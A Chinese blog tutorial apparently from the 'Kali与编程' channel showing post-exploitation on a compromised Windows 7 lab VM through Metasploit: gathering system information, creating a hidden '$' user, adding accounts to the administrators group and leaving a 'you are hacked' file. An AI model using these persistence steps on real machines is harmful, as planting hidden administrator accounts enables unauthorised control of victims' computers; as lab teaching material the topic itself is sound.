当前位置:网站首页>网络安全工程师演示:原来***是这样获取你的计算机管理员权限的!【维持】
网络安全工程师演示:原来***是这样获取你的计算机管理员权限的!【维持】
2020-11-06 01:35:00 【Kali与编程】
课前声明:
1、本分享仅做学习交流,请自觉遵守法律法规!
2、搜索:Kali 与编程,学习更多网络***干货!
3、Kali 与编程每天准时更新,敬请学习和关注!
正文部分
一、背景介绍
Metasploit就是一个漏洞框架。它的全称叫做The Metasploit Framework,简称叫做MSF。Metasploit作为全球最受欢迎的工具,不仅仅是因为它的方便性和强大性,更重要的是它的框架。它允许使用者开发自己的漏洞脚本,从而进行测试。Metasploit(msf)究竟威力如何呢?如何利用***控制受害者主机呢?接下来让我们一起学习!
二、资源装备
1.成功拿下的 Win7虚拟机一台
2.整装待发的小白一个。
3.安装好的Kali Linux虚拟机一台。
三、战略安排
3.1 对拿下的Windows主机进入后***阶段,具体操作如下图所示。
步骤1:运行漏洞利用模块,如下图所示。
命令:run
步骤2:进入Windows主机的cmd窗口,如下图所示。
步骤3:利用命令查看受害者主机的系统信息,知己知彼对目标受害者主机进行更全面的掌握,更全面的控制目标主机,获取更全面的信息,如下图所示。
命令:systeminfo
步骤4:受害者主机的系统信息如下图所示。
3.2 对受害者主机进行用户管理操作,如下图所示。
步骤1:给受害者主机添加可以隐藏的用户信息,如下图所示。
命令:net user 新用户名$ 用户密码 /add
例子:net user admin$ 12456 /add
步骤2:查看刚才添加的新用户,如下图所示。
命令:net user(因为新建的用户为隐藏用户,所以命令行查看不到该用户)
步骤3:添加不隐藏的新用户,如下图所示。
命令:net user 新用户名 用户密码 /add
例子:net user admin 12456 /add
步骤4:查看刚才添加的新用户,如下图所示。
命令:net user
步骤5:在受害者主机中利用图形化界面查看刚才新建的用户,可见在该界面是可以看见新建的隐藏用户的(如果需要实现真正意义上的隐藏用户的话需要更改注册表,请持续关注本号后续讲解)
步骤6:删除用户,如下图所示。
命令:net user 用户名 /del
例子:net user admin /del
步骤7:将新建的用户添加到管理员组,如下图所示。
命令:net localgroup administrators /add
步骤8:查看管理员组的用户,如下图所示。
命令:net localgroup administrators
3.3 对受害者主机进行文件操作,如下图所示。
步骤1:新建文件夹
命令:md 文件名
例子:md abc
步骤2:删除文件夹
命令:rd 文件名
例子:rd abc
步骤3:新建文本文件,如下图所示。
命令:echo 文本文件内容 > 文件名
例子:echo hi you are hacked > hk.txt
3.4 对受害者主机进行查看主机名操作,如下图所示。
命令:hostname
小编一个个字敲打创作,可辛苦了,问君可否关注一下我呢?你还可搜索:Kali与编程,学习更多******技巧呢 !拒绝盗版,转载请声明来源:Kali与编程
点我学习更多Kali Linux***测试与网络***实战技巧!请添加链接描述
版权声明
本文为[Kali与编程]所创,转载请带上原文链接,感谢
https://blog.51cto.com/14308022/2547210
边栏推荐
猜你喜欢
随机推荐
通过深层神经网络生成音乐
不能再被问住了!ReentrantLock 源码、画图一起看一看!
Skywalking系列博客5-apm-customize-enhance-plugin插件使用教程
6.8 multipartresolver file upload parser (in-depth analysis of SSM and project practice)
哇,ElasticSearch多字段权重排序居然可以这么玩
梯度下降算法在机器学习中的工作原理
数据科学家与机器学习工程师的区别? - kdnuggets
阻塞队列之LinkedBlockingQueue分析
深入了解JS数组的常用方法
8.2.3 implementation of interceptors (interceptors and filters) through handlerinterceptor
如何对Pandas DataFrame进行自定义排序
使用ES5实现ES6的Class
7.3.1 file upload and zero XML registration interceptor
UML类图还不懂?来看看这版乡村爱情类图,一把学会!
7.2.2 compressing static resources through gzipresourceresolver
PMP考试心得
mongodb(从0到1),11天mongodb初级到中级进阶秘籍
JVM Metaspace内存溢出排查与总结
高级 Vue 组件模式 (3)
面经手册 · 第16篇《码农会锁,ReentrantLock之公平锁讲解和实现》